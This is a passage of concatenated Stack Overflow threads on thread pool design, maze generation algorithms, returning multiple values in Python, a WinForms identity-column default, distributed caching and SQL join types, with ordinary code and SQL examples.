"url": "https://stackoverflow.com/questions/38463",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Thread pool for executing arbitrary tasks with different priorities I'm trying to come up with a design for a thread pool with a lot of design requirements for my job. This is a real problem for working software, and it's a difficult task. I have a working implementation but I'd like to throw this out to SO and see what interesting ideas people can come up with, so that I can compare to my implementation and see how it stacks up. I've tried to be as specific to the requirements as I can.
The thread pool needs to execute a series of tasks. The tasks can be short running (<1sec) or long running (hours or days). Each task has an associated priority (from 1 = very low to 5 = very high). Tasks can arrive at any time while the other tasks are running, so as they arrive the thread pool needs to pick these up and schedule them as threads become available.
The task priority is completely independent of the task length. In fact it is impossible to tell how long a task could take to run without just running it.
Some tasks are CPU bound while some are greatly IO bound. It is impossible to tell beforehand what a given task would be (although I guess it might be possible to detect while the tasks are running).
The primary goal of the thread pool is to maximise throughput. The thread pool should effectively use the resources of the computer. Ideally, for CPU bound tasks, the number of active threads would be equal to the number of CPUs. For IO bound tasks, more threads should be allocated than there are CPUs so that blocking does not overly affect throughput. Minimising the use of locks and using thread safe/fast containers is important.
In general, you should run higher priority tasks with a higher CPU priority (ref: SetThreadPriority). Lower priority tasks should not "block" higher priority tasks from running, so if a higher priority task comes along while all low priority tasks are running, the higher priority task will get to run.
The tasks have a "max running tasks" parameter associated with them. Each type of task is only allowed to run at most this many concurrent instances of the task at a time. For example, we might have the following tasks in the queue:
*
*A - 1000 instances - low priority - max tasks 1
*B - 1000 instances - low priority - max tasks 1
*C - 1000 instances - low priority - max tasks 1
A working implementation could only run (at most) 1 A, 1 B and 1 C at the same time.
It needs to run on Windows XP, Server 2003, Vista and Server 2008 (latest service packs).
For reference, we might use the following interface:
namespace ThreadPool
{
class Task
{
public:
Task();
void run();
};
class ThreadPool
{
public:
ThreadPool();
~ThreadPool();
void run(Task *inst);
void stop();
};
}
A: So what are we going to pick as the basic building block for this? Windows has two building blocks that look promising: I/O Completion Ports (IOCPs) and Asynchronous Procedure Calls (APCs). Both of these give us FIFO queuing without having to perform explicit locking, and with a certain amount of built-in OS support in places like the scheduler (for example, IOCPs can avoid some context switches).
APCs are perhaps a slightly better fit, but we will have to be slightly careful with them, because they are not quite "transparent". If the work item performs an alertable wait (::SleepEx, ::WaitForXxxObjectEx, etc.) and we accidentally dispatch an APC to the thread then the newly dispatched APC will take over the thread, suspending the previously executing APC until the new APC is finished. This is bad for our concurrency requirements and can make stack overflows more likely.
A:
It needs to run on Windows XP, Server 2003, Vista and Server 2008 (latest service packs).
What feature of the system's built-in thread pools make them unsuitable for your task? If you want to target XP and 2003 you can't use the new shiny Vista/2008 pools, but you can still use QueueUserWorkItem and friends.
A: @DrPizza - this is a very good question, and one that strikes right to the heart of the problem. There are a few reasons why QueueUserWorkItem and the Windows NT thread pool was ruled out (although the Vista one does look interesting, maybe in a few years).
Firstly, we wanted to have greater control over when it starts up and stops threads. We have heard that the NT thread pool is reluctant to start up a new thread if it thinks that the tasks are short running. We could use the WT_EXECUTELONGFUNCTION flag, but we really have no idea if the task is long or short.
Secondly, if the thread pool was already filled up with long running, low priority tasks, there would be no chance of a high priority task getting to run in a timely manner. The NT thread pool has no real concept of task priorities, so we can't do a QueueUserWorkItem and say "oh by the way, run this one right away".
Thirdly, (according to MSDN) the NT thread pool is not compatible with the STA apartment model. I'm not sure quite what this would mean, but all of our worker threads run in an STA.
A:
@DrPizza - this is a very good question, and one that strikes right to the heart of the problem. There are a few reasons why QueueUserWorkItem and the Windows NT thread pool was ruled out (although the Vista one does look interesting, maybe in a few years).
Yeah, it looks like it got quite beefed up in Vista, quite versatile now.
OK, I'm still a bit unclear about how you wish the priorities to work. If the pool is currently running a task of type A with maximal concurrency of 1 and low priority, and it gets given a new task also of type A (and maximal concurrency 1), but this time with a high priority, what should it do?
Suspending the currently executing A is hairy (it could hold a lock that the new task needs to take, deadlocking the system). It can't spawn a second thread and just let it run alongside (the permitted concurrency is only 1). But it can't wait until the low priority task is completed, because the runtime is unbounded and doing so would allow a low priority task to block a high priority task.
My presumption is that it is the latter behaviour that you are after?
A: @DrPizza:
OK, I'm still a bit unclear about how you wish the priorities to work. If the pool is currently running a task of type A with maximal concurrency of 1 and low priority, and it gets given a new task also of type A (and maximal concurrency 1), but this time with a high priority, what should it do?
This one is a bit of a tricky one, although in this case I think I would be happy with simply allowing the low-priority task to run to completion. Usually, we wouldn't see a lot of the same types of tasks with different thread priorities. In our model it is actually possible to safely halt and later restart tasks at certain well defined points (for different reasons than this) although the complications this would introduce probably aren't worth the risk.
Normally, only different types of tasks would have different priorities. For example:
*
*A task - 1000 instances - low priority
*B task - 1000 instances - high priority
Assuming the A tasks had come along and were running, then the B tasks had arrived, we would want the B tasks to be able to run more or less straight away.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38501",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: What's a good algorithm to generate a maze? Say you want a simple maze on an N by M grid, with one path through, and a good number of dead ends, but that looks "right" (i.e. like someone made it by hand without too many little tiny dead ends and all that). Is there a known way to do this?
A: It turns out there are 11 classic algorithms to generate "perfect" mazes. A maze is perfect if it has one, and only one, solution. Here are some links to each algorithm, in rough order of my preference.
*
*Kruskal's
*Prim's
*Recursive Backtracker
*Aldous-Broder
*Growing Tree
*Hunt-and-Kill
*Wilson's
*Eller's
*Recursive Division (Predictable)
*Sidewinder (Predictable)
*Binary Tree (Flawed)
For more info, check out mazelib on GitHub, a Python library implementing all the standard maze generating/solving algorithms.
A: Strangely enough, by slightly changing the 'canonical' rules and starting from a random configuration, Conway's Game of Life seems to generate pretty nice mazes!
(I don't remember the exact rule, but it's a very simple modification that tends to 'densify' the population of cells...)
A: From http://www.astrolog.org/labyrnth/algrithm.htm
Recursive backtracker: This is somewhat related to the recursive backtracker solving method described below, and requires stack up to the size of the Maze. When carving, be as greedy as possible, and always carve into an unmade section if one is next to the current cell. Each time you move to a new cell, push the former cell on the stack. If there are no unmade cells next to the current position, pop the stack to the previous position. The Maze is done when you pop everything off the stack. This algorithm results in Mazes with about as high a "river" factor as possible, with fewer but longer dead ends, and usually a very long and twisty solution. It runs quite fast, although Prim's algorithm is a bit faster. Recursive backtracking doesn't work as a wall adder, because doing so tends to result in a solution path that follows the outside edge, where the entire interior of the Maze is attached to the boundary by a single stem.
They produce only 10% dead ends. [Example image of a maze generated by that method.]
A: A pretty straightforward solution could be to assign random weights to the graph edges and apply Kruskal's algorithm to find a minimum spanning tree.
Best discussion ever on maze generation algorithms: http://www.jamisbuck.org/presentations/rubyconf2011/index.html (was on HN a couple days ago).
A: Recursive Backtracking is the easiest algorithm to implement.
Here's a Java implementation:
Here Cell is a class representing a cell in a 2D grid and cells is a 2D array of Cell objects. Cell has boolean variables top, bottom, left and right to indicate whether a cell has walls on these sides, a boolean variable visited to check whether we have traversed it and two integer variables row and col to indicate its position in the grid.
Stack<Cell> st = new Stack<>(); // backtracking stack (java.util.Stack; ArrayList and Random are used below)
Cell current = cells[0][0], next;
current.visited = true;
do{
next = getNeighbour(current);
if(next!=null){
removeWall(current , next);
st.push(current);
current = next;
current.visited = true;
}
else {
current = st.pop();
}
}
while (!st.empty());
private Cell getNeighbour(Cell cell){
ArrayList<Cell> ara = new ArrayList<>();
if(cell.col>0 && !cells[cell.col-1][cell.row].visited)
ara.add(cells[cell.col-1][cell.row]);
if(cell.row>0 && !cells[cell.col][cell.row-1].visited)
ara.add(cells[cell.col][cell.row-1]);
if(cell.col<col-1 && !cells[cell.col+1][cell.row].visited)
ara.add(cells[cell.col+1][cell.row]);
if(cell.row<row-1 && !cells[cell.col][cell.row+1].visited)
ara.add(cells[cell.col][cell.row+1]);
if(ara.size()>0){
return ara.get(new Random().nextInt(ara.size()));
}else{
return null;
}
}
private void removeWall(Cell curr , Cell nxt){
if((curr.col == nxt.col) && (curr.row == nxt.row+1)){/// top
curr.top = nxt.bottom = false;
}
if(curr.col==nxt.col && curr.row == nxt.row-1){///bottom
curr.bottom = nxt.top = false;
}
if(curr.col==nxt.col-1 && curr.row==nxt.row ){///right
curr.right = nxt.left = false;
}
if(curr.col == nxt.col+1 && curr.row == nxt.row){///left
curr.left = nxt.right = false;
}
}
A: One of the methods to generate a maze is the randomized version of Prim's algorithm.
Start with a grid full of walls.
Pick a cell, mark it as part of the maze. Add the walls of the cell to the wall list.
While there are walls in the list:
Pick a random wall from the list. If the cell on the opposite side isn't in the maze yet:
(i) Make the wall a passage and mark the cell on the opposite side as part of the maze.
(ii) Add the neighboring walls of the cell to the wall list.
If the cell on the opposite side already was in the maze, remove the wall from the list.
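As a compact illustration of those steps (my own sketch, not from the answer), here is randomized Prim's in Python, returning for each cell the set of neighbouring cells it is connected to:
import random

def prim_maze(n, m):
    in_maze = set()
    passages = {(r, c): set() for r in range(n) for c in range(m)}

    def neighbours(cell):
        r, c = cell
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            if 0 <= r + dr < n and 0 <= c + dc < m:
                yield (r + dr, c + dc)

    start = (random.randrange(n), random.randrange(m))
    in_maze.add(start)
    walls = [(start, nb) for nb in neighbours(start)]

    while walls:
        idx = random.randrange(len(walls))
        cell, other = walls.pop(idx)          # pick a random wall from the list
        if other not in in_maze:
            passages[cell].add(other)         # carve the passage
            passages[other].add(cell)
            in_maze.add(other)
            walls.extend((other, nb) for nb in neighbours(other))
    return passages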
A: My favorite way is to use Kruskal's algorithm, but when randomly choosing an edge to remove, weight the choice based on the types of edges it's connected to.
By varying the weights for different edge types, you can generate mazes with lots of distinct characteristics or "personalities". See my example here:
https://mtimmerm.github.io/webStuff/maze.html
A: Here's the DFS algorithm written as pseudocode:
create a CellStack (LIFO) to hold a list of cell locations
set TotalCells = number of cells in grid
choose a cell at random and call it CurrentCell
set VisitedCells = 1
while VisitedCells < TotalCells
find all neighbors of CurrentCell with all walls intact
if one or more found
choose one at random
knock down the wall between it and CurrentCell
push CurrentCell location on the CellStack
make the new cell CurrentCell
add 1 to VisitedCells
else
pop the most recent cell entry off the CellStack
make it CurrentCell
endIf
endWhile
A: I prefer a version of the Recursive Division algorithm. It is described in detail here.
I will give a quick overview:
The original recursive division algorithm works as follows. First, start with an empty area for the maze. Add one straight wall to divide the chamber in two, and put one hole in that wall somewhere. Then, recursively repeat this process on each of the two new chambers until the desired passage size is reached. This is simple and works well, but there are obvious bottlenecks which make the maze easy to solve.
The variant solves this problem by drawing randomized, "curved" walls rather than straight ones, making the bottlenecks less obvious.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38502",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "76"
} |
Q: What's the best way to return multiple values from a function? I have a function where I need to do something to a string. I need the function to return a boolean indicating whether or not the operation succeeded, and I also need to return the modified string.
In C#, I would use an out parameter for the string, but there is no equivalent in Python. I'm still very new to Python and the only thing I can think of is to return a tuple with the boolean and modified string.
Related question: Is it pythonic for a function to return multiple values?
A: Returning a tuple is the usual way to do this in Python.
A: Why not throw an exception if the operation wasn't successful? Personally, I tend to be of the opinion that if you need to return more than one value from a function, you should reconsider if you're doing things the right way or use an object.
But more directly to the point, if you throw an exception, you're forcing them to deal with the problem. If you try to return a value that indicates failure, it's very possible somebody won't check the value and will end up with some potentially hard-to-debug errors.
A: Throwing an exception for failure is one good way to proceed, and if you're returning a lot of different values, you can return a tuple. For the specific case you're citing, I often take an intermediate approach: return the modified string on success, and return None on failure. I'm enough of an unreconstructed C programmer to want to return a NULL pointer to char on failure.
If I were writing a routine to be used as part of a larger library and consumed by other developers, I'd throw an exception on failure. When I'm eating my own dogfood, I'll probably return different types and test on return.
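A tiny illustration of that "modified string or None" pattern (the function here is just an example):
def upcase_if_alpha(s):
    if not s.isalpha():
        return None          # failure
    return s.upper()         # success: the modified string

result = upcase_if_alpha("abc")
if result is not None:
    print(result)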
A: Return a tuple.
def f(x):
# do stuff
return (True, modified_string)
success, modified_string = f(something)
A: def f(in_str):
out_str = in_str.upper()
return True, out_str # Creates tuple automatically
succeeded, b = f("a") # Automatic tuple unpacking
A: You can use a return statement with multiple expressions; Python packs them into a tuple automatically.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38508",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "78"
} |
Q: C# WinForms - DataGridView/SQL Compact - Negative integer in primary key column I'm just getting dirty in WinForms, and I've discovered, through a lovely tutorial, the magic of dragging a database table onto the design view of my main form. So, all is lovely, I've got my DataGridView with all of the columns represented beautifully.
BUT...
When I run my application against this brand new, empty .sdf (empty save for the two tables I've created, which are themselves empty), I get a -1 in the column corresponding to my primary key/identity column whenever I try to create that first record.
Any idea why this might be happening? If it helps, the column is an int.
A: @Brian -1 is a good choice for the default value since no "real" rows are likely to have identities less than zero. If it defaulted to 0 or 1 then there'd be a chance that it'd clash with an existing row, causing a primary key violation.
For applications that stay offline and create multiple rows before saving, a common practice is to continue counting backwards (-2, -3, -4) for each new row's identity. Then when they're saved, the server can replace them with the true "next" value from the table.
A: Since it is an Identity column and you haven't saved it to the database yet it is -1. I am assuming here that this is before you save the table back to the database, correct? You need to perform the insert before that value will be set correctly.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38510",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Distributed caching with .NET 2.0+? What is the best approach to implement distributed caching with .NET?
Edit: I was looking for a general caching schema for internal and external applications
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38548",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: What is the difference between "INNER JOIN" and "OUTER JOIN"? Also, how do LEFT OUTER JOIN, RIGHT OUTER JOIN, and FULL OUTER JOIN fit in?
A: The Venn diagrams don't really do it for me.
They don't show any distinction between a cross join and an inner join, for example, or more generally show any distinction between different types of join predicate or provide a framework for reasoning about how they will operate.
There is no substitute for understanding the logical processing and it is relatively straightforward to grasp anyway.
*
*Imagine a cross join.
*Evaluate the on clause against all rows from step 1 keeping those where the predicate evaluates to true
*(For outer joins only) add back in any outer rows that were lost in step 2.
(NB: In practice the query optimiser may find more efficient ways of executing the query than the purely logical description above but the final result must be the same)
I'll start off with an animated version of a full outer join. Further explanation follows.
Explanation
Source Tables
First start with a CROSS JOIN (AKA Cartesian Product). This does not have an ON clause and simply returns every combination of rows from the two tables.
SELECT A.Colour, B.Colour FROM A CROSS JOIN B
Inner and Outer joins have an "ON" clause predicate.
*
*Inner Join. Evaluate the condition in the "ON" clause for all rows in the cross join result. If true return the joined row. Otherwise discard it.
*Left Outer Join. Same as inner join then for any rows in the left table that did not match anything output these with NULL values for the right table columns.
*Right Outer Join. Same as inner join then for any rows in the right table that did not match anything output these with NULL values for the left table columns.
*Full Outer Join. Same as inner join then preserve left non matched rows as in left outer join and right non matching rows as per right outer join.
Some examples
SELECT A.Colour, B.Colour FROM A INNER JOIN B ON A.Colour = B.Colour
The above is the classic equi join.
Animated Version
SELECT A.Colour, B.Colour FROM A INNER JOIN B ON A.Colour NOT IN ('Green','Blue')
The inner join condition need not necessarily be an equality condition and it need not reference columns from both (or even either) of the tables. Evaluating A.Colour NOT IN ('Green','Blue') on each row of the cross join returns.
SELECT A.Colour, B.Colour FROM A INNER JOIN B ON 1 =1
The join condition evaluates to true for all rows in the cross join result so this is just the same as a cross join. I won't repeat the picture of the 16 rows again.
SELECT A.Colour, B.Colour FROM A LEFT OUTER JOIN B ON A.Colour = B.Colour
Outer Joins are logically evaluated in the same way as inner joins except that if a row from the left table (for a left join) does not join with any rows from the right hand table at all it is preserved in the result with NULL values for the right hand columns.
SELECT A.Colour, B.Colour FROM A LEFT OUTER JOIN B ON A.Colour = B.Colour WHERE B.Colour IS NULL
This simply restricts the previous result to only return the rows where B.Colour IS NULL. In this particular case these will be the rows that were preserved as they had no match in the right hand table and the query returns the single red row not matched in table B. This is known as an anti semi join.
It is important to select a column for the IS NULL test that is either not nullable or for which the join condition ensures that any NULL values will be excluded in order for this pattern to work correctly and avoid just bringing back rows which happen to have a NULL value for that column in addition to the un matched rows.
SELECT A.Colour, B.Colour FROM A RIGHT OUTER JOIN B ON A.Colour = B.Colour
Right outer joins act similarly to left outer joins except they preserve non matching rows from the right table and null extend the left hand columns.
SELECT A.Colour, B.Colour FROM A FULL OUTER JOIN B ON A.Colour = B.Colour
Full outer joins combine the behaviour of left and right joins and preserve the non matching rows from both the left and the right tables.
SELECT A.Colour, B.Colour FROM A FULL OUTER JOIN B ON 1 = 0
No rows in the cross join match the 1=0 predicate. All rows from both sides are preserved using normal outer join rules with NULL in the columns from the table on the other side.
SELECT COALESCE(A.Colour, B.Colour) AS Colour FROM A FULL OUTER JOIN B ON 1 = 0
With a minor amend to the preceding query one could simulate a UNION ALL of the two tables.
SELECT A.Colour, B.Colour FROM A LEFT OUTER JOIN B ON A.Colour = B.Colour WHERE B.Colour = 'Green'
Note that the WHERE clause (if present) logically runs after the join. One common error is to perform a left outer join and then include a WHERE clause with a condition on the right table that ends up excluding the non matching rows. The above ends up performing the outer join...
... And then the "Where" clause runs. NULL= 'Green' does not evaluate to true so the row preserved by the outer join ends up discarded (along with the blue one) effectively converting the join back to an inner one.
If the intention was to include only rows from B where Colour is Green and all rows from A regardless the correct syntax would be
SELECT A.Colour, B.Colour FROM A LEFT OUTER JOIN B ON A.Colour = B.Colour AND B.Colour = 'Green'
SQL Fiddle
See these examples run live at SQLFiddle.com.
A: left join on returns inner join on rows union all unmatched left table rows extended by nulls.
right join on returns inner join on rows union all unmatched right table rows extended by nulls.
full join on returns inner join on rows union all unmatched left table rows extended by nulls union all unmatched right table rows extended by nulls.
outer is optional & has no effect.
(SQL Standard 2006 SQL/Foundation 7.7 Syntax Rules 1, General Rules 1 b, 3 c & d, 5 b.)
So don't outer join on until you know what underlying inner join on is involved.
Find out what rows inner join on returns:
CROSS JOIN vs INNER JOIN in SQL
That also explains why Venn(-like) diagrams are not helpful for inner vs outer join.
For more on why they are not helpful for joins generally:
Venn Diagram for Natural Join
A: In simple words :
Inner join -> Take ONLY common records from parent and child tables WHERE primary key of Parent table matches Foreign key in Child table.
Left join ->
pseudo code
1.Take All records from left Table
2.for(each record in right table) {
if(Records from left & right table matching on primary & foreign key){
use their values as it is as result of join at the right side for 2nd table.
} else {
put value NULL values in that particular record as result of join at the right side for 2nd table.
}
}
Right join : Exactly opposite of left join . Put name of table in LEFT JOIN at right side in Right join , you get same output as LEFT JOIN.
Outer join : Show all records in both tables no matter what. If records in the left table do not match the right table based on the primary/foreign key, use NULL values as the result of the join.
Example :
Lets assume now for 2 tables
1.employees , 2.phone_numbers_employees
employees : id , name
phone_numbers_employees : id , phone_num , emp_id
Here, the employees table is the master table and phone_numbers_employees is the child table (it contains emp_id as a foreign key which connects to employees.id, so it's the child table).
Inner joins
Take the records of 2 tables ONLY IF Primary key of employees table(its id) matches Foreign key of Child table phone_numbers_employees(emp_id).
So query would be :
SELECT e.id , e.name , p.phone_num FROM employees AS e INNER JOIN phone_numbers_employees AS p ON e.id = p.emp_id;
Here we take only rows matching on primary key = foreign key, as explained above. Rows that do not match on primary key = foreign key are skipped from the result of the join.
Left joins :
Left join retains all rows of the left table, regardless of whether there is a row that matches on the right table.
SELECT e.id , e.name , p.phone_num FROM employees AS e LEFT JOIN phone_numbers_employees AS p ON e.id = p.emp_id;
Outer joins :
SELECT e.id , e.name , p.phone_num FROM employees AS e OUTER JOIN phone_numbers_employees AS p ON e.id = p.emp_id;
Diagramatically it looks like :
A: You use INNER JOIN to return all rows from both tables where there is a match. i.e. In the resulting table all the rows and columns will have values.
In OUTER JOIN the resulting table may have empty columns. Outer join may be either LEFT or RIGHT.
LEFT OUTER JOIN returns all the rows from the first table, even if there are no matches in the second table.
RIGHT OUTER JOIN returns all the rows from the second table, even if there are no matches in the first table.
A: INNER JOIN requires there is at least a match in comparing the two tables. For example, table A and table B, which implies A ∩ B (A intersection B).
LEFT OUTER JOIN and LEFT JOIN are the same. It gives all the records matching in both tables and all possibilities of the left table.
Similarly, RIGHT OUTER JOIN and RIGHT JOIN are the same. It gives all the records matching in both tables and all possibilities of the right table.
FULL JOIN is the combination of LEFT OUTER JOIN and RIGHT OUTER JOIN without duplication.
A: Assuming you're joining on columns with no duplicates, which is a very common case:
*
*An inner join of A and B gives the result of A intersect B, i.e. the inner part of a Venn diagram intersection.
*An outer join of A and B gives the results of A union B, i.e. the outer parts of a Venn diagram union.
Examples
Suppose you have two tables, with a single column each, and data as follows:
A B
- -
1 3
2 4
3 5
4 6
Note that (1,2) are unique to A, (3,4) are common, and (5,6) are unique to B.
Inner join
An inner join using either of the equivalent queries gives the intersection of the two tables, i.e. the two rows they have in common.
select * from a INNER JOIN b on a.a = b.b;
select a.*, b.* from a,b where a.a = b.b;
a | b
--+--
3 | 3
4 | 4
Left outer join
A left outer join will give all rows in A, plus any common rows in B.
select * from a LEFT OUTER JOIN b on a.a = b.b;
select a.*, b.* from a,b where a.a = b.b(+);
a | b
--+-----
1 | null
2 | null
3 | 3
4 | 4
Right outer join
A right outer join will give all rows in B, plus any common rows in A.
select * from a RIGHT OUTER JOIN b on a.a = b.b;
select a.*, b.* from a,b where a.a(+) = b.b;
a | b
-----+----
3 | 3
4 | 4
null | 5
null | 6
Full outer join
A full outer join will give you the union of A and B, i.e. all the rows in A and all the rows in B. If something in A doesn't have a corresponding datum in B, then the B portion is null, and vice versa.
select * from a FULL OUTER JOIN b on a.a = b.b;
a | b
-----+-----
1 | null
2 | null
3 | 3
4 | 4
null | 6
null | 5
A: The answer is in the meaning of each one, so in the results.
Note :
In SQLite there is no RIGHT OUTER JOIN or FULL OUTER JOIN.
And also in MySQL there is no FULL OUTER JOIN.
My answer is based on above Note.
When you have two tables like these:
--[table1] --[table2]
id | name id | name
---+------- ---+-------
1 | a1 1 | a2
2 | b1 3 | b2
CROSS JOIN / OUTER JOIN :
You can have all of both tables' data with CROSS JOIN or just with , like this:
SELECT * FROM table1, table2
--[OR]
SELECT * FROM table1 CROSS JOIN table2
--[Results:]
id | name | id | name
---+------+----+------
1 | a1 | 1 | a2
1 | a1 | 3 | b2
2 | b1 | 1 | a2
2 | b1 | 3 | b2
INNER JOIN :
When you want to add a filter to above results based on a relation like table1.id = table2.id you can use INNER JOIN:
SELECT * FROM table1, table2 WHERE table1.id = table2.id
--[OR]
SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id
--[Results:]
id | name | id | name
---+------+----+------
1 | a1 | 1 | a2
LEFT [OUTER] JOIN :
When you want to have all rows of one of the tables in the above result, with the same relation, you can use LEFT JOIN:
(For RIGHT JOIN just change place of tables)
SELECT * FROM table1, table2 WHERE table1.id = table2.id
UNION ALL
SELECT *, Null, Null FROM table1 WHERE Not table1.id In (SELECT id FROM table2)
--[OR]
SELECT * FROM table1 LEFT JOIN table2 ON table1.id = table2.id
--[Results:]
id | name | id | name
---+------+------+------
1 | a1 | 1 | a2
2 | b1 | Null | Null
FULL OUTER JOIN :
When you also want to have all rows of the other table in your results you can use FULL OUTER JOIN:
SELECT * FROM table1, table2 WHERE table1.id = table2.id
UNION ALL
SELECT *, Null, Null FROM table1 WHERE Not table1.id In (SELECT id FROM table2)
UNION ALL
SELECT Null, Null, * FROM table2 WHERE Not table2.id In (SELECT id FROM table1)
--[OR] (recommended for SQLite)
SELECT * FROM table1 LEFT JOIN table2 ON table1.id = table2.id
UNION ALL
SELECT * FROM table2 LEFT JOIN table1 ON table2.id = table1.id
WHERE table1.id IS NULL
--[OR]
SELECT * FROM table1 FULL OUTER JOIN table2 On table1.id = table2.id
--[Results:]
id | name | id | name
-----+------+------+------
1 | a1 | 1 | a2
2 | b1 | Null | Null
Null | Null | 3 | b2
Well, you choose whichever one covers your need ;).
A: 1. Inner Join: also called Join. It returns only the rows present in both the left table and the right table where there is a match; otherwise it returns zero records.
Example:
SELECT
e1.emp_name,
e2.emp_salary
FROM emp1 e1
INNER JOIN emp2 e2
ON e1.emp_id = e2.emp_id
2. Full Outer Join: also called Full Join. It returns all the rows present in both the left table and the right table.
Example:
SELECT
e1.emp_name,
e2.emp_salary
FROM emp1 e1
FULL OUTER JOIN emp2 e2
ON e1.emp_id = e2.emp_id
3. Left Outer Join: or simply Left Join. It returns all the rows present in the left table and the matching rows from the right table (if any).
4. Right Outer Join: also called Right Join. It returns the matching rows from the left table (if any), and all the rows present in the right table. A sketch of both follows below.
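A minimal sketch of items 3 and 4, reusing the same hypothetical emp1/emp2 tables from the examples above:
-- 3. Left outer join: all rows from emp1, matches (or NULL) from emp2
SELECT e1.emp_name, e2.emp_salary
FROM emp1 e1
LEFT OUTER JOIN emp2 e2
ON e1.emp_id = e2.emp_id
-- 4. Right outer join: all rows from emp2, matches (or NULL) from emp1
SELECT e1.emp_name, e2.emp_salary
FROM emp1 e1
RIGHT OUTER JOIN emp2 e2
ON e1.emp_id = e2.emp_id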
Advantages of Joins
*
*Executes faster.
A: Inner join.
A join combines the rows from two tables. An inner join attempts to match up the two tables based on the criteria you specify in the query, and only returns the rows that match. If a row from the first table in the join matches two rows in the second table, then two rows will be returned in the results. If there’s a row in the first table that doesn’t match a row in the second, it’s not returned; likewise, if there’s a row in the second table that doesn’t match a row in the first, it’s not returned.
Outer Join.
A left join attempts to match up the rows from the first table with rows in the second table. If it can’t find a match, it will return the columns from the first table and leave the columns from the second table blank (null).
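As a sketch of the behaviour described above (the table and column names are made up for illustration, not from the answer itself):
-- Inner join: only pairs that satisfy the criteria are returned
SELECT f.id, s.value
FROM first_table f
JOIN second_table s ON s.first_id = f.id;
-- Left join: every row of first_table; second_table columns are NULL when unmatched
SELECT f.id, s.value
FROM first_table f
LEFT JOIN second_table s ON s.first_id = f.id;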
A: *
*Inner join - An inner join using either of the equivalent queries gives the intersection of the two tables, i.e. the two rows they have in common.
*Left outer join - A left outer join will give all rows in A, plus any common rows in B.
*Full outer join - A full outer join will give you the union of A and B, i.e. all the rows in A and all the rows in B. If something in A doesn't have a corresponding datum in B, then the B portion is null, and vice versa.
A: Joins are more easily explained with an example:
To simulate persons and emails stored in separate tables,
Table A and Table B are joined by Table_A.id = Table_B.name_id
Inner Join
Only matched ids' rows are shown.
Outer Joins
Left join: matched ids plus the unmatched rows of Table A are shown.
Right join: matched ids plus the unmatched rows of Table B are shown.
Full outer join: matched ids plus the unmatched rows from both tables are shown.
Note: Full outer join is not available on MySQL
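Since the original images are not reproduced here, a rough sketch of the queries the answer describes, assuming tables Table_A(id, ...) and Table_B(name_id, email):
-- Inner join: only matched ids
SELECT * FROM Table_A a JOIN Table_B b ON a.id = b.name_id;
-- Left join: matched ids plus unmatched rows of Table A
SELECT * FROM Table_A a LEFT JOIN Table_B b ON a.id = b.name_id;
-- Right join: matched ids plus unmatched rows of Table B
SELECT * FROM Table_A a RIGHT JOIN Table_B b ON a.id = b.name_id;
-- Full outer join: matched ids plus unmatched rows from both (not available in MySQL)
SELECT * FROM Table_A a FULL OUTER JOIN Table_B b ON a.id = b.name_id;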
A:
*
*INNER JOIN: the most typical join for two or more tables.
It returns the rows that match in both tables, based on the primary key / foreign key relation in the ON clause.
*OUTER JOIN is the same as INNER JOIN, but it also includes non-matching rows, padded with NULLs, in the result set.
*
*LEFT JOIN = INNER JOIN + Unmatched data of left table with Null match on right table.
*RIGHT JOIN = INNER JOIN + Unmatched data of right table with Null match on left table.
*FULL JOIN = INNER JOIN + Unmatched data on both right and left tables with Null matches.
*Self join is not a keyword in SQL; when a table references data in itself, that is known as a self join. Self-join queries are written using INNER JOIN or OUTER JOIN (a sketch follows after the example below).
For example:
SELECT *
FROM tablea a
INNER JOIN tableb b
ON a.primary_key = b.foreign_key
INNER JOIN tablec c
ON b.primary_key = c.foreign_key
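And a minimal self-join sketch, reusing the hypothetical tablea from the example above and assuming it also has a parent_id column that refers back to its own primary_key:
SELECT child.*, parent.*
FROM tablea child
INNER JOIN tablea parent          -- same table joined to itself under two aliases
ON child.parent_id = parent.primary_key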
A: I don't see much details about performance and optimizer in the other answers.
Sometimes it is good to know that only INNER JOIN is associative, which means the optimizer has the most options to play with it. It can reorder the joins to make the query faster while keeping the same result, and it can choose among the most join methods.
Generally it is a good practice to try to use INNER JOIN instead of the different kind of joins. (Of course if it is possible considering the expected result set.)
There are a couple of good examples and explanation here about this strange associative behavior:
*
*Are left outer joins associative?
*Does the join order matter in SQL?
A: Having criticized the much-loved red-shaded Venn diagram, I thought it only fair to post my own attempt.
Although @Martin Smith's answer is the best of this bunch by a long way, his only shows the key column from each table, whereas I think ideally non-key columns should also be shown.
The best I could do in the half hour allowed, I still don't think it adequately shows that the nulls are there due to absence of key values in TableB or that OUTER JOIN is actually a union rather than a join:
A: The precise algorithm for INNER JOIN and LEFT/RIGHT OUTER JOIN is as follows:
*
*Take each row from the first table: a
*Consider all rows from second table beside it: (a, b[i])
*Evaluate the ON ... clause against each pair: ON( a, b[i] ) = true/false?
*
*When the condition evaluates to true, return that combined row (a, b[i]).
*When the end of the second table is reached without any match, and this is an outer join, return a (virtual) pair using Null for all columns of the other table: (a, Null) for a LEFT outer join or (Null, b) for a RIGHT outer join. This ensures all rows of the first table exist in the final results.
Note: the condition specified in ON clause could be anything, it is not required to use Primary Keys (and you don't need to always refer to Columns from both tables)! For example:
*
*... ON T1.title = T2.title AND T1.version < T2.version ( => see this post as a sample usage: Select only rows with max value on a column)
*... ON T1.y IS NULL
*... ON 1 = 0 (just as sample)
Note: Left Join = Left Outer Join, Right Join = Right Outer Join.
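A sketch of the first bullet above (a non-key ON condition), using hypothetical tables T1 and T2 that both have title and version columns:
-- Keep only rows of T1 for which no T2 row has the same title and a higher version,
-- i.e. the "max value per group" pattern referenced above.
SELECT T1.*
FROM T1
LEFT OUTER JOIN T2
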